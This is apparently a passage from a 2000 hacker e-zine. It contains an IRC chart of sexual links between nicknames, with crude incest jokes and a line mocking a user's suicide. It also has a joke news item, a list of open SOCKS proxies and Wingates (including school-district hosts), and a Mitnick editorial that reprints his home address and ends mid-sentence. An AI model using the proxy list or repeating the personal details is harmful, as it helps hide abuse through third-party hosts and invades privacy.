|||||| | | jsz | || `.| | littleone `-.|| .----|--. | ||
|||||`. `-|--. wing -------' |`---.||.--|------------ juliet --.| max-q ||
||||`-|-. | | mooks nts |||| `-. gfm --. | || | ||
|||`. | | | `------------|---|-- *fuz!* --|-------- morgen | looey | ||
||`-|-|-|-|-- kitkat^ ----|---|----'||`----|- lesb0 -|--|---|---. | ||
|| | | | | | | || | | | | luq | ||
|`--|-|-|-|---------------|---|-----'| dangergrl earle | | | ||
| | | | | sparxx --- l0ra!@ ----' | | | | | scorpion | ||
| `-|-|-|---------------'|| || slawz | | WIL WHEAT0N | | | ||
| | | | dt --'| |`----------|--|--------. | sfuze | ||
| | | | .--' | .---' oghost mchemist --' | ||
| | `-|--------------|----|-------|---------------' | | ||
| | `--------------|--- theejoker zens -- skinflower suiciety | ||
| | rosieriv -- tfish | | | | | | ||
| | | | `-----. quagmire | monachus -|-|-- daud | ||
| | | chlamydiarose | | | | | | ||
| `------|---. | | nekkidamy polymorf `---. | .'.'|
| .-- gheap | Zomba_Soul isis --------|---|------------|-|------|-|-'
| | | .--- q | | | | | |
| | | acronym | | | syndrome | |.-----' `-.
| torquie ------|-- countzero | | | | | | || plexor |
| | | | *thepublic* | | | || | |
`--|----|--------|-- theora -- RAgent | | | | | || | |
ludi dispater | | | rainbow lust!@@# --' |
`--------|----|-- dildog -- ladyada .--|-----' | | |||| | |
phen bopeep | .-|--|--- *maq* -. | |||| netmask -'
.---|------' | | montel --. .-------|-|--|-----' | | | |||`-|--------.
| el_jefe ---|-|-------- Heather sami | | .-----|---|-' ||| | |
| | | | | | | | .---' | ||| | cal |
| Mika tari --|-|-- dan_farmer .-- *pill* | | | vamprella ||| | | |
| `-. | | | | .----|--|-|-|---|-------'|`. | Er1s |
| val -- shipley -- muffy demonika --|--' | | purpcon | | | | |
| | || | | | .-'| |||| .-' .-' | .---|-|-|-' JonM |
| karrin --'| | danea mycroft | |||`-|--. | .-|-- kel -|---|-|-' | |
| | | | | | ||| | lizzie | .-' | | | | JiJi |
| CGD -- jen `-|--- banshee | | ||| | | | | | gh0st --|-|------' |
`---------------|------------' | ||| | | sage | `--. .--' `-. shaedow
Astaroth | wraith --|--'|| `-|------|----|----|-----.| | |
| | | | |`----|------|-- *disorder* wednesday |
DangerJen .--- se7en t | `-----|------|----|-|-|---------' |
| | | `---. | onyx -- furie | | | blaise -- skippy |
msk ---' simunye pandora `---|------------|----|-|------------------'
||| michelle ----|----' yt -- panther_modern
||`---------------------------------. .---|---------------.
|| .--------------------------- fizzgig --|-- rubella |
|`----|-------------------------. | | | | |
Imperia | deadgirl | | | | | |
| | lethar ----------. |.-|--|---|-|---' neologic |
Asmodeus | | | | || | | | `---. | |
.--' | | | valeriee Mali netik -|-----|-- mayfair | Kalannar
| Sinja | | | | | | | | |
| | Xaotika StVitus | | | fishie -- Missa | E_D |
| | | | | | | | |
| outside -- emmie Frobozz | | belial --- Uadjit -- solomon -- Mottyl
| | | | | | | | | | |`---.
| rebrane | Murmur_gth | | | |.---------|-' Grue --|--|-- moomin13
| | | | | | | ||.--------|-----' | |
`--------|------|---------|-- gothbitch! -------|-----------' Fiore --.
JelloMold *bifrost* `--. | ||`---------|--------------'| |
| `----- aex |`--- pahroza -- anubis MartYr |
bile -- turtlgrl --------|----|------' | | |
inox Miah secretboy Arkham Stipen
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
hydro311 Starr angieb am0eba -- spyder_bytes thepublic -- rage
| | |
Chef -- meenk ---- gweeds tigerbeck -- bifrost disorder -- kamira
| | |
fuz B00bz magpie pinguino -- pill maq -- apok0lyps
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
"the big loop" is over 800 people! holy crap!
work for the chart.
the top rankings:
----------------
#1 winner -- pinguino & gweeds -- 21 links! it's a tie!
#2 winner -- meenk -- 19 links!
#3 winner -- crank -- 18 links!
#4 winner -- xgirl -- 15 links!
#5 winner -- n0elle & sQurl -- 13 links! it's a tie!
honorable mention:
-----------------
12 links: gothbitch, ophie, GoNINzo, Wayhigh, & phyzzix!
11 links: murmur, evol, lust, Mikey, & fuz!
10 links: pip, & tigerbeck!
9 links: metalchic, Kaleid, hillary, y-windows, fuz, hitchcock, demonika,
& l0ra!
be a winner *today*!
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
unconfirmed links:
these are links i've been told more than twice to add, but have then been
told by others to remove once they're on the chart. each link stays for
six months, & if no one can prove it's valid in that time, it is
removed & assumed untrue.
if you bore witness to one of these links or know someone who did, mail
crank@ice.net with your confession!
(no unconfirmed links at this time.)
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
notable gross things on the chart:
this is a section for easy reference to family members on the chart. the
end people are the relation as noted. if you know two people on the big
loop are in the same family, mail crank@ice.net & let us rejoice in the
incest!
tigerbeck -- aries99
1 link: siblings
spirit -- hillary -- seth -- candyrain
3 links: siblings
pixy -- gweeds -- jess -- andrew -- mswicked
4 links: siblings
blueeyes -- 8ball -- crank -- aoxomoxoa -- poppie -- donnie
5 links: siblings
art -- seaya -- kaia -- murmur -- sonia -- plexus
5 links: siblings
potter -- scat -- bF -- evol -- styx
4 links: cousins
christy -- kkrazy -- kinessa -- gweeds -- LCN -- tanadept
5 links: stepsiblings
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
#2600:
lashtal
|
empress deadguy | maverick
| | | |
sin ----- speck -- liquid_motion
| |
beastly -- c4in d_rebel
kspiff -- mimes -- dieznyik -- nelli
|
borys -- zebby (#bodyart)
LdyMuriel Erato flutterbi chexbitz
`---. | .---' |
Kalika -- IceHeart -------------- virago -- mre
|| | | |
Berdiene --'| | Pyra -- Roamer ewheat
| `---------.
Serenla --' roach -- satsuki -- spinningmind
kitiara -- starlord
anarchy -- aphex twin
soul seeker -- educated guess
tempus thales -- lady in black -- midnight sorrow
magnatop -- darice
jandor -- alexis ryna
illusionx -- thumper
javaman -- nrmlgrl
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
bodyart [#bodyart/#bodypiercing/#tattoo]:
ga[r]y
| |
xindjoo -- grrtigger -- bone-head
| |
FreAkBoi -- psychoslut -- timo
heidikins -- pasquale
grub -- gypsie
tabaqui -- catbones -- sprite
ministry -- SuperMia -- superdave
bert37 -- chiot
steppah -- creeper
syx66 -- gypsy_whore
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
#coders:
simon -- wolfie -- raphael (#trax)
bolt -- ashli
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
#ezines:
sirlance -- holly -- hardcore
|
rattle -- s4ra -- doommaker
phairgirl -- M4D_3LF -- amanda -- unrelated -- effy -- BigDaddyBill
| |
pixieOpower
spiff -- tl109
figglemuffinz -- creed
ilsundal -- fairy_princess
vanir -- darkland
snarfblat -- d1d1
dimes -- bexy -- mindcrime
tut -- casey
pezmonkey -- cptbovine
greyhawk -- crazybaby
cheesus -- meowkovich
catbutt -- pulse
ygraine -- drool
bigmike -- shana
camel -- icee
UberFizzGig -- kniht -- wadsworth
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
#hack:
t0c -- seussy -- o0
|
taner
glyph -- adnama -- weaselboy -- vein -- montell
| |
m0rticia
shamrock -- jennicide -- efpee -- imposter-dh
|
bellum
radikahl -- jazmine -- gitm
t3kg -- elfgard
pluvius -- lydia
panic -- plant -- erikt
sl33p -- molldoll
allman -- costales
rhost -- sue_white
serpent -- no_ana
vaxbuster -- tiggie -- redragon
ajrez -- luminare -- m0jo
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
#mindvox:
killarney -- tomwhore -- fairosa -- kids
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
misc:
MsLePew -- Beacher
sangfroid -- inspektor
foo -- leeny
HippieEB -- Imaj
mskathy -- strahd
plutonium -- pixiedust
cnelson -- vanessa
Hawkerly --- MeaNKaT --- Morpheus
Vega1 -- Serena
DIPTY_DO -- Trish_ -- hellsnake
Grace^ -- Gusto -- puckie
notyou -- jennyh
Skada -- icee_bin -- eriss
doogie -- sarahlove
kirby-wan -- cybergirl
lurid -- deb -- bmbr
j-dog -- a_kitten
Fenchurch -- Becca
captain_zap -- ms_infowar
jaran -- duke
chs -- princess
ndex -- illusions
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
music [#punk/#ska/#sxe]:
solaris -- kojak -- chelsea -- pieskin -- lady rude
|
kcskin -- janew
|
kamaskin -- kimee -- dano
joojoo nes
| |
auralee -- konfuz -- subgurl -- danx -- starla
| |
kathy21 alee
mutata -- skidman
shellskin -- amberskin
astrophil -- maggiemae
skarjerk -- pancreas
prick -- taxie -- jubjub
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
#seattle:
nitefall bgh -- superlime -- Shill -- Lizsac fimble
| | |
juice -- e1mo -- shane -- aeriona -- Justnsane -- koosh -- tcb
clarita -- dataangel
wyclef -- NessaLee
Drmc -- Jill-
SisSoul -- Matt
Dawgie -- Jenay
jsk -- ames
Liz -- jkowall
kurgan -- babygrrl
Mcbeth -- BeccaBoo
djinn -- ruthe
wankle -- carrianne
hamilton -- nurit
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
#skate:
kindje -- tigerkat -- huphtur -- superzan
|
punkgirl -- yakuza -- maryjane
|
caroline -- rhy
cosmo cks lodias
`--. | .--'
outlander -- spike -- lightborn
.--'|||`--.
darkelf ||| weevil
|||
tenchi --'|`-- h0ly
[r]
katskate -- earwax
vlinder -- miesj
superfly -- conchita -- nobaboon -- no_fievel
p4nacea -- bakunin
herculez -- nicki
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
#trax:
cardiac sandman -- trissy skie -- necros
| | |
saxy -- vegas basehead
| | |
kiwidog fassassin -- discodiva
gblues
|
squeep -- qporucpine -- ami -- dilvish
higherbeing -- ms_saigon -- floss
| |
howler vizz
mellow-d -- kisu -- snowman -- trixi
|
megz
lowrider -- lum -- perisoft
mickrip -- astrid -- draggy -- leece
pandorra -- malakai
ozone -- bliss
animix -- pixie
lummy -- daedalus
frostbitten_dream -- pickl'ette -- redial
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
#twilight_zone:
revneptho dtm Frizz0 Wireless
`----.| .---' |
h0lydirt --- nina -- zbrightmn -- halah
.--'| `---. |
dog3 | whistler RockShox
|
chilly
joeN -- daysee -- evil_ed -- linnea
|
munchie
Loverman -- Missi
redbird -- reddy
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
#unix:
in4mer -- devilgrl
gerg -- tyger
chloe -- cosmos
dem -- webb
callechan -- rhiannon
RealScott -- Ila
supertaz -- skye
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
revision history -- last updated 7-28-99
v9.04: added belial, f_fisher, Murmur_gth, bix, DJTrax, kamira, Heather,
phen, montel, monachus, Schquimpy, Nex, phreaky, Sylvie, Katia,
banshee, PointBlank, & RaggedyAnne.
added magpie, hydro311, kamira, disorder, apok0lyps, maq, rage,
& thepublic to the secondary chart.
(if anyone has an alternate nick for the #gothic Murmur, please mail
me. i used the nick Murmur_gth for now.)
added misc gh0st group to the big loop.
gweeds moves up to winner 1.
meenk moves up to winner 2.
gothbitch moves up to honorable mention 12.
renamed Listener to alecks.
renamed illuminaeti to luminare.
renamed zines category to #ezines.
added phairgirl -- pixieOpower -- M4D_3LF -- amanda to #ezines.
added amanda -- unrelated -- effy -- BigDaddyBill to #ezines.
added jennicide -- bellum to #hack.
added luminare -- ajrez to #hack.
added to misc:
deb -- bmbr
j-dog -- a_kitten
Fenchurch -- Becca
captain_zap -- ms_infowar
deb -- lurid
jaran -- duke
chs -- princess
ndex -- illusions
removed one outdated "unconfirmed link".
removed miasma -- six from unconfirmed. oops.
removed bogus links:
t -- gf -- lilfeet
Quarex -- keroppi
new links:
fizzgig -- (solomon, Asmodeus, fishie, belial)
Grue -- gothbitch -- Asmodeus
gothbitch -- belial -- Uadjit
METchiCK -- (f_fisher, grimmy, deadapril, supervixn)
kel -- (disorder, lizzie, gh0st)
corp -- gweeds -- magpie
aex -- Murmur_gth
eppie -- bix
styx -- DJTrax
meenk -- hydro311
halfman -- sumogirl
disorder -- kamira -- apok0lyps -- maq -- Heather -- montel
el_jefe -- (Mika, phen, Heather)
daud -- monachus
amos -- velcro
Schquimpy -- (trilobyte, EddieV, Nex)
splat -- phreaky
Sylvie -- neko -- Katia
shipley -- banshee
thepublic -- rage
hylonome -- PointBlank -- RaggedyAnne
hylonome -- RaggedyAnne -- Quarex
v9.03: added deadgirl, Gemni, DrMonk, AK47, monkeygrl, Miah, grlfrmars,
wildcard, spectacle, kev-man, bile, chinagirl, rubella, Arkham,
Uadjit, fishie, solomon, moomin13, Grue, Missa, Mottyl, Kalannar,
E_D, Fiore, MartYr, & Stipen.
added angieb to the secondary chart.
updated number of people in the big loop.
gweeds moves up to winner 2.
meenk moves up to winner 3.
gothbitch moves up to honorable mention 9.
added miasma -- six to unconfirmed.
added zines The_Sock group to the big loop.
added zines AnonGirl group to the big loop.
added javaman -- nrmlgrl to #2600.
added satsuki -- (IceHeart, roach, spinningmind) to #2600.
added doogie -- sarahlove to misc.
added kirby-wan -- cybergirl to misc.
added shane -- aeriona to #seattle.
added to #trax:
skie -- necros
astrid -- draggy
ms_saigon -- vizz
snowman -- megz
removed bogus links:
mailart -- konfuz (mailart = nes)
new links:
DH -- Gemni -- DrMonk
meenk -- AK47
gweeds -- angieb
AIDS -- caitlin
deadgirl -- Mali -- maq
logicbox -- monkeygrl
Fiore -- gothbitch -- Miah
grlfrmars -- (mogel, wildcard, spectacle, kev-man)
turtlegrl -- bile
trilobyte -- chinagirl
fizzgig -- rubella
anubis -- Arkham
swisspope -- AnonGirl
pahroza -- Uadjit -- solomon -- moomin13 -- Grue
Fiore -- solomon -- gothbitch -- Uadjit -- fishie -- Missa
Mottyl -- (solomon, Kalannar, E_D)
MartYr -- Fiore -- Stipen
v9.02: added rebrane, Xaotika, valeriee, JelloMold, neologic, amos, EddieV,
Roadruner, TAYL0R HAWKINS, MINNIE DRIVER, secretboy, kel, nevre,
freqout, krnl, skatin, Sinja, Frobozz, & hawk.
gweeds moves up to winner 2.
meenk moves up to winner 3.
sQurl moves up to winner 6.
metalchic moves up to honorable mention 9.
renamed cannianne to carrianne.
added to misc:
Hawkerly --- MeaNKaT --- Morpheus
Vega1 -- Serena
DIPTY_DO -- Trish_ -- hellsnake
Grace^ -- Gusto -- puckie
notyou -- jennyh
Skada -- icee_bin -- eriss
(special note: eriss was dumped for Skada & subsequently leapt
to her death from a nineteeth story window. neat!)
added to #zines:
nico -- anjee -- meethos -- METchiCK -- The_Sock -- ^mindy^
meethos -- Alucard -- The_Sock -- kitn -- ILUVJeNNA
MrJuGGaLo -- METchiCK -- facedown
caitlin --- wmmr --- coffeegrl
AnonGirl -- Medusa -- PrimeX -- Juliette
removed bogus links:
emmie -- (netik, msk, Herodotus)
billn -- Tay -- retrospek
mayfair -- outside
Mali -- (Asmodeus, pahroza, Uhlume, Imperia)
new links:
emmie -- rebrane -- JelloMold
Xaotika -- lethar -- valeriee
mayfair -- neologic
trilobyte -- amos -- EddieV -- sonia
sQurl -- Roadruner
Tay -- TAYL0R HAWKINS -- MINNIE DRIVER
anubis -- secretboy
netmask -- kel
meenk -- nevre
gweeds -- freqout
missx -- krnl
metalchic -- skatin
Imperia -- Asmodeus -- Sinja
turtlgrl -- pahroza -- gothbitch -- Mali -- lethar
fizzgig -- msk
gothbitch -- Frobozz
darwin -- hawk
v9.01: added tamago, atticus, lilindian, martyn, aries99, ryshask, timmerca,
twichykat, soulvamp, mysl, fizzgig, lethar, anubis, & inox.
added tigerbeck & bifrost to the secondary chart.
updated number of people in the big loop.
new "gross link":
tigerbeck -- aries99 (1: siblings)
gweeds moves up to winner 3.
tigerbeck moves up to honorable mention 10.
added FreAkBoi -- psychoslut -- timo to #bodyart.
added supertaz -- skye to #unix.
removed one outdated "unconfirmed link".
removed bogus links:
juliet -- readwerd
FreAkBoi -- ga[r]y (#bodyart)
Briana -- homeysan
new links:
seaya -- tamago
_Melody_ -- atticus
DrkSphere -- lilindian
tigerbeck -- (aries99, martyn, ryshask, timmerca, soulvamp)
tigerbeck -- (allira, twichykat, spacegirl, bifrost)
gweeds -- mysl
msk -- DangerJen -- Astaroth
outside -- mayfair
netik -- fizzgig
emmie -- lethar
pahroza -- anubis
aex -- inox
v9.00: i was going to do something special for 9.00, but there just isn't
anything to do. would you people be interested in sexchart
tshirts? mail crank@ice.net.
note to webmasters - it's not sexchart.8 anymore - sexchart.txt. be
sure to update your links.
added NeuralizR, vlaad, pahroza, Imperia, Mali, Uhlume, StVitus,
Herodotus, & Asmodeus.
added am0eba, & spyder_bytes to the secondary chart.
added netik & Mali sections to the big loop.
added new section: #seattle.
moved e1mo links to #seattle.
moved koosh -- tcb to #seattle.
moved clarita -- dataangel to #seattle.
added chexbitz -- virago -- ewheat to #2600.
added Astaroth -- DangerJen to #gothic.
added plutonium -- pixiedust to misc.
added cnelson -- vanessa to misc.
added to #seattle:
wyclef -- NessaLee
Drmc -- Jill-
SisSoul -- Matt
Dawgie -- Jenay
jsk -- ames
Liz -- jkowall
bgh -- superlime -- Shill -- Lizsac
fimble -- koosh -- Justnsane -- aeriona -- superlime
kurgan -- babygrrl
Mcbeth -- BeccaBoo
djinn -- ruthe
wankle -- cannianne
hamilton -- nurit
added halah -- Wireless to #twilight_zone.
removed one outdated "unconfirmed link".
removed bogus links:
e1mo -- chris22 (#seattle)
loki -- am0eba -- sledge
missx -- (sledge, erikb, ice9)
Briana -- nebulizr
logicbox -- skully
murcurochrome -- jazmine -- deadkat (#hack)
new links:
am0eba -- spyder_bytes
Briana -- (NeuralizR, bumble, nettwerk, homeysan, tsal)
teletype -- vlaad
netik -- msk -- emmie -- outside
aex -- bifrost -- emmie -- netik
emmie -- Herodotus
bifrost -- turtlgrl
Imperia -- msk
Mali -- (Uhlume, Imperia, Asmodeus, StVitus, pahroza)
@HWA
05.0 Peer finally arrested after over a decade of connection resetting
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From http://www.ircnews.com/
(Humour, in case you didn't know a common connection error is
"connection reset by peer" caused by errors in the network and on
occasion a DoS attack on your IRC connection... ;) - Ed)
Peer Arrested, Charged With Resetting Connections
SEATTLE, WA - An exhaustive eight month cyberhunt
ended shortly before dawn on January 14th, 2000, as FBI
agents and Washington State Troopers apprehended the
elusive chatroom terrorist known only as Peer.
The IRC menace was brought to justice after a
decade-long connection resetting spree that plagued
chatters around the globe. FBI officials said the number of
reset connections numbered in the "millions".
Connections being reset by peer were the number one
cause of interupted chat sessions on all major IRC
networks in 1999.
Undernet ChanServ Committee member Morrissey told
IRCNews.com, "What set peer apart was the element of
suprise. With ping, you kinda knew you were gonna time
out. You could tell. Peer totally got you out of nowhere."
Leland, another bigshot on the Undernet IRC network,
praised the FBI for their work, "How many idle times must
be ruined? How many cybersex sessions must be cut
short before we put an end to Peer and his shinanigans?"
Peer's lawyers criticized Leland's use of the word
"shinanigans".
Peer's lead defence attorney responded, "Really, I think
we can come up with a better term than that. We're all
adults here. Besides, it's 'alleged' shinanigans."
Federal Prosecutor Sarah Evans told IRCNews.com she
intends to "throw the book" at Peer. If convicted on all
counts, Peer could spend up to the next three years on
probation.
"His ass is mine.", claimed a motivated Evans. "With any
luck, we'll get that judge who handled the Mitnick case."
@HWA
06.0 Updated proxies list from IRC4all
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.lightspeed.de/irc4all/
Socks 4 proxies:
~~~~~~~~~~~~~~~~
NotFound 200.248.68.129
NotFound 200.36.19.225
NotFound 195.5.52.154
ch-angrignon.qc.ca 207.236.200.66
m105.clic-in.com.br 200.231.28.15
NotFound 195.42.150.129
www.quicktest.com 12.8.210.132
internet-server.ebf.com.br 200.231.27.1
wk135.dnr-inc.com 216.62.50.135
122-94.w3.com.uy 207.3.122.94
mail.theova.com 195.14.148.65
mercury.knowlbo.co.jp 210.160.144.146
igic.bas-net.by 194.85.255.49
cr216724724.cable.net.co 216.72.47.24
zakproxy.alexcomm.net 163.121.219.62
proxy.quicktest.com 12.8.210.130
NotFound 195.14.148.101
NotFound 210.237.181.226
zskom.vol.cz 212.27.207.7
tsp-proxy.tsss.com 12.2.81.50
proxy.utvlive.com 194.46.2.34
news.ukrnafta.ukrtel.net 195.5.22.196
pcse.essalud.sld.pe 200.37.132.130
dns-server1.tj.pa.gov.br 200.242.244.1
cr216724718.cable.net.co 216.72.47.18
NotFound 194.85.255.117
NotFound 195.42.150.132
NotFound 212.22.69.35
patter.lnk.telstra.net 139.130.81.160
nic-c49-067.mw.mediaone.net 24.131.49.67
NotFound 206.112.35.146
ts18.svamberk.cz 212.47.11.231
NotFound 212.68.162.183
NotFound 194.204.206.139
mars.sos.com.pl 195.117.212.4
mail.ermanco.com 12.2.82.130
www.ukrnafta.ukrtel.net 195.5.22.195
39.volgaex.ru 194.84.127.39
NotFound 194.243.99.199
www.cassvillesd.k12.wi.us 216.56.42.3
34.volgaex.ru 194.84.127.34
pc-gusev3.ccas.ru 193.232.81.47
xl2.cscd.lviv.ua 195.5.56.1
modemcable161.21-200-24.timi.mc.videotron.net 24.200.21.161
tconl9076.tconl.com 204.26.90.76
jm1.joroistenmetalli.fi 194.137.219.130
jovellanos.com 194.224.183.221
ns.ticketport.co.jp 210.160.142.82
plebiscito.synapsis.it 195.31.227.14
NotFound 194.243.99.162
NotFound 194.204.205.93
NotFound 212.205.26.80
NotFound 210.56.18.228
h0000e894998c.ne.mediaone.net 24.128.161.28
NotFound 198.162.23.185
www.sos.iqnet.cz 212.71.157.102
ns.terna.ru 212.188.26.67
NotFound 206.103.12.131
NotFound 203.116.5.58
207-246-74-54.xdsl.qx.net 207.246.74.54
adsl-63-196-81-8.dsl.sndg02.pacbell.net 63.196.81.8
glennsil.ne.mediaone.net 24.128.160.74
dns.hokuto.ed.jp 210.233.0.34
210-55-191-126.ipnets.xtra.co.nz 210.55.191.126
relectronic.ozemail.com.au 203.108.38.61
sai0103.erols.com 207.96.118.243
frontier.netline.net.au 203.28.52.160
210-55-191-125.ipnets.xtra.co.nz 210.55.191.125
NotFound 212.68.162.177
216-59-41-69.usa.flashcom.net 216.59.41.69
mail.medikona.lt 195.14.162.220
NotFound 195.14.148.99
proxy1.israeloff.com 206.112.35.156
NotFound 195.14.148.98
NotFound 195.14.148.97
mail.trutnov.cz 212.27.207.8
sripenanti01-kmr.tm.net.my 202.188.62.6
c111.h202052116.is.net.tw 202.52.116.111
NotFound 195.14.148.100
nevisco.city.tvnet.hu 195.38.100.242
ipshome-gw.iwahashi.co.jp 210.164.242.146
216-59-40-227.usa.flashcom.net 216.59.40.227
NotFound 212.47.11.130
216-59-40-72.usa.flashcom.net 216.59.40.72
altona.lnk.telstra.net 139.130.80.123
burnem.lnk.telstra.net 139.130.54.178
edtn004203.hs.telusplanet.net 161.184.152.139
ns.ukrnafta.ukrtel.net 195.5.22.193
edtn002050.hs.telusplanet.net 161.184.144.18
nic-c40-143.mw.mediaone.net 24.131.40.143
gk8-206.47.23.149.kingston.net 206.47.23.149
dns.rikcad.co.jp 210.170.89.210
dsl-148-146.tstonramp.com 206.55.148.146
52-012.al.cgocable.ca 205.237.52.12
216-59-38-142.usa.flashcom.net 216.59.38.142
dns1.ctsjp.co.jp 210.172.87.146
52-061.al.cgocable.ca 205.237.52.61
edtn003590.hs.telusplanet.net 161.184.150.34
modemcable215.2-200-24.hull.mc.videotron.net 24.200.2.215
Socks 5 proxies
~~~~~~~~~~~~~~~
NotFound 195.5.52.154
NotFound 168.187.78.34
NotFound 210.56.18.228
NotFound 200.241.64.130
NotFound 206.112.35.146
NotFound 194.243.99.162
NotFound 194.243.99.199
garrison-grafixx.com 216.36.30.76
internet-server.ebf.com.br 200.231.27.1
pc-gusev3.ccas.ru 193.232.81.47
mail.clintrak.com 206.112.35.178
NotFound 195.146.97.178
ns.wings.co.jp 210.168.241.106
wk135.dnr-inc.com 216.62.50.135
ts18.svamberk.cz 212.47.11.231
jm1.joroistenmetalli.fi 194.137.219.130
morris.ocs.k12.al.us 216.77.56.74
c111.h202052116.is.net.tw 202.52.116.111
relectronic.ozemail.com.au 203.108.38.61
jovellanos.com 194.224.183.221
oms.ocs.k12.al.us 216.77.56.106
ntserver01.thomastonschools.org 209.150.52.114
port58151.btl.net 206.153.58.151
mail.medikona.lt 195.14.162.220
chester.chesterschooldistrict.com 12.6.236.250
NotFound 206.103.12.131
p5.itb.it 194.243.165.21
NotFound 194.226.183.34
nic-c49-067.mw.mediaone.net 24.131.49.67
south.ocs.k12.al.us 216.77.56.90
NotFound 195.146.98.226
cr216724718.cable.net.co 216.72.47.18
north.ocs.k12.al.us 216.77.56.66
dns.hokuto.ed.jp 210.233.0.34
linux.edu.vologda.ru 194.84.125.217
proxy.utvlive.com 194.46.2.34
ibp.santa.krs.ru 195.161.57.133
dns.rikcad.co.jp 210.170.89.210
207-246-74-54.xdsl.qx.net 207.246.74.54
jeter.ocs.k12.al.us 216.77.56.98
carver.ocs.k12.al.us 216.77.56.114
ohs.ocs.k12.al.us 216.77.56.122
wforest.ocs.k12.al.us 216.77.56.82
dns1.ctsjp.co.jp 210.172.87.146
edtn003590.hs.telusplanet.net 161.184.150.34
edtn004203.hs.telusplanet.net 161.184.152.139
165-246.tr.cgocable.ca 24.226.165.246
216-59-41-69.usa.flashcom.net 216.59.41.69
Wingates
~~~~~~~~
NotFound 210.56.18.228
NotFound 206.103.12.131
port58151.btl.net 206.153.58.151
NotFound 200.241.64.130
wk135.dnr-inc.com 216.62.50.135
cr216724718.cable.net.co 216.72.47.18
dns.hokuto.ed.jp 210.233.0.34
dns.rikcad.co.jp 210.170.89.210
altona.lnk.telstra.net 139.130.80.123
burnem.lnk.telstra.net 139.130.54.178
52-061.al.cgocable.ca 205.237.52.61
proxy.utvlive.com 194.46.2.34
207-246-74-54.xdsl.qx.net 207.246.74.54
edtn002050.hs.telusplanet.net 161.184.144.18
dns1.ctsjp.co.jp 210.172.87.146
edtn004203.hs.telusplanet.net 161.184.152.139
mars.sos.com.pl 195.117.212.4
165-246.tr.cgocable.ca 24.226.165.246
Other proxies available, check the site for more/updated lists.
@HWA
07.0 Rant: Mitnick to go wireless?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Editorial, by Cruciphux
Jan 23rd 2000
Finally the long awaited release of ueber hacker Kevin Mitnick has
arrived, he was released Friday Jan. 21st in the morning and is not
allowed to touch computers or cellular phones for a period of three
years without express permission of his probation officer.
Kevin holds out one hope though, earlier in his 'carreer' Kevin was
an avid amateur radio operator and his license recently expired, he
is reportedly scrambling to obtain a new one. This poses some very
interesting questions, will he be allowed to operate his HAM equipment?
Packet Radio
For those not in the know myself and several HWA members are also
HAM operators, most of us got hooked by the prospect of a technology
called "packet radio". The internet runs on a protocol known as X.25
packet radio uses a similar methodology known as AX.25, the "A" denotes
"A"mateur. We're some of the few people that have actually IRC'ed
using a packet radio link to a unix server over the 2m band, but of
course this requires a computer and additional computer equipment hooked
to the radio gear necessary to run packet, what if we forget all that
since it is out of Kevin's reach to own a computer at this time and look
at what other 'trouble' he can get into.
Repeater Nets and the Autopatch
The radios of choice these days among young hams are dual band HT's (short
for handy-talky or 'walky-talkie') these will usually cover the 2m band
and the 440 cm bands, the 2m band by itself is the most common band in use
and operates a great deal using repeaters. A repeater can be compared to
a cell site insomuch as it takes a weak signal (the HT, generally 100mw to
4 watts in power, much like small cell phones) and REPEATS or re-broadcasts
on another (close) frequency a stronger signal, thus reaching greater
range. With special DTMF codes it is possible to LINK repeaters and talk
across the country using repeater nets.
Whats so great about this?, apart from the obvious ability to talk to people
long distances for little to no cost, many repeaters have the magic box
known as an AUTOPATCH. The autopatch is a computer interface at the repeater
site that interfaces your radio signals with a TELCO line. (aha!). Yes
many hams enjoy the priviledges (minus obvious privacy and anonymity) of
'cellular' or 'radio phone' useage for minimal cost. For a GOOD radio you
are looking at an investment around $500 and for a HAM club membership
(to get all the repeater and autopatch codes etc) you're looking at around
$15/year or you can find the codes posted in many places on the web.
Caveats / privacy
The airwaves are 'public property' and as such are regulated (for our own
good of course) by big brother, that being the FCC in the U.S.A or DOC in
Canada. When you pass your licensing test (minimal proficiency in electronics
and general radio theory must be demonstrated via written test) you will be
assigned a unique CALL SIGN (in some places you can request a custom/vanity
sequence but will be allocated a random unused call if your request is being
used). Since the airwaves are public property, so are the records of those
users that are licensed to broadcast on them. Several online databases exist
or can be purchased cheaply on CDROM with many search features like search by
name, call address, partials etc... in this case a simple search on the QRZ
website (http://www.qrz.com/) in the OLD database for "Kevin Mitnick" returns
several possible matches, among them the correct one which is listed below.
--------------------------------------------------------------------------
Callbook Data for N6NHG
The following information is taken from the March 1993 QRZ Ham Radio
Callsign Database. This is not the current information for this callsign.
Click on the underlined callsign to see the latest information for this
record.
Callsign: N6NHG
Class: General
Name: KEVIN D MITNICK
Effective: 12 Dec 1989
Expires: 12 Dec 1999
Address: 14744 LEADWELL ST
City/State: VAN NUYS CA 91405
--------------------------------------------------------------------------
We can safely assume this is correct since the initials (KDM) are right and
the location matches up along with the license renewal date of 12/12/99.
Shennanigans
How does Kevin fit into all this? well as you can see, it is possible to
interface the radio with computer equipment and also manipulate outside
phone lines using ham radios, a recurring problem in these parts were pirate
operators making bogus 911 calls using the local CN-Tower's (then public or
